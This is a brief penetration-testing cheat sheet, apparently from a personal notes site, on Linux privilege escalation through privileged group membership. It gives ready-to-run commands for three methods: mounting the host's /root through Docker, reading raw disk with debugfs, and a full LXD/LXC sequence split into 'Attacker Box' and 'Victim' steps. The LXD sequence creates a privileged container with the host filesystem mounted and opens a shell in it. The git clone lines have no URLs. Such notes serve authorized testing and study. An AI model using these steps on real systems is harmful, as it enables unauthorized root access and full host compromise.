GTFO Groups


Try to use an existing image. You can mount directories from the host, and therefore read/write all files.

docker run -v /root:/mnt/xct -ti ubuntu


Privileged File Read: debugfs /dev/sdax


On Attacker Box:

sudo apt install lxd zfsutils-linux
usermod --append --groups lxd xct
lxd init (choose dir instead of zfs)
git clone
cd lxd-alpine-builder
lxc launch ubuntu:18.04
lxc list

git clone
cd lxd-alpine-builder

Upload the .tar.gz that is built.

On Victim:

lxd init
lxc image import ./apline-v3.10-x86_64-20191008_1227.tar.gz --alias xct
lxc image list
lxc init xct ignite -c security.privileged=true
lxc config device add ignite xct disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh

Host file system will be mounted in /mnt/root.

Last updated